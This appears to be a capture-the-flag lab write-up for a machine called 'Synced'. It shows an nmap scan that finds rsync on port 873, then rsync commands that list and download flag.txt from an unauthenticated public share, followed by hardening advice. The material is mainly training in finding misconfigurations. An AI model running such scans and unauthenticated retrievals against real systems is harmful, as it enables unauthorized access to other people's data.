- Machine Name: Synced
- IP Address: 10.129.239.186
- User: cywf
- NMAP Scan: I initiated the exploration with an NMAP scan to identify open ports and services on the target machine.
$nmap -p- -T4 -sV 10.129.239.186
Results:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-10 05:01 BST
Nmap scan report for 10.129.239.186
Host is up (0.070s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.60 seconds
- RSYNC Exploration: After identifying that RSYNC was running on port 873, I proceeded to explore its shares.
First, I listed the available shares:
$rsync --list-only 10.129.239.186::
This revealed a public share named "public".
Next, I inspected the contents of the "public" share:
$rsync --list-only 10.129.239.186::public
I found a file named flag.txt and proceeded to retrieve it:
$rsync 10.129.239.186::public/flag.txt flag.txt
Finally, I displayed the contents of the flag.txt file:
$cat flag.txt
The RSYNC service on the target machine was misconfigured, allowing unauthorized access to its shares. This allowed me to access and retrieve files from the "public" share without any authentication.
- Enable Authentication: Ensure that RSYNC is running with authentication enabled. This can be achieved by setting up an rsync secrets file and configuring the rsync daemon to use it.
- Limit Access: Restrict access to the RSYNC shares to trusted IP addresses or networks using the hosts allow and hosts deny options in the rsyncd.conf file.
- Monitor Logs: Regularly monitor RSYNC logs for any suspicious activity or unauthorized access attempts.
- Regularly Update: Ensure that RSYNC is regularly updated to the latest version to benefit from security patches and improvements.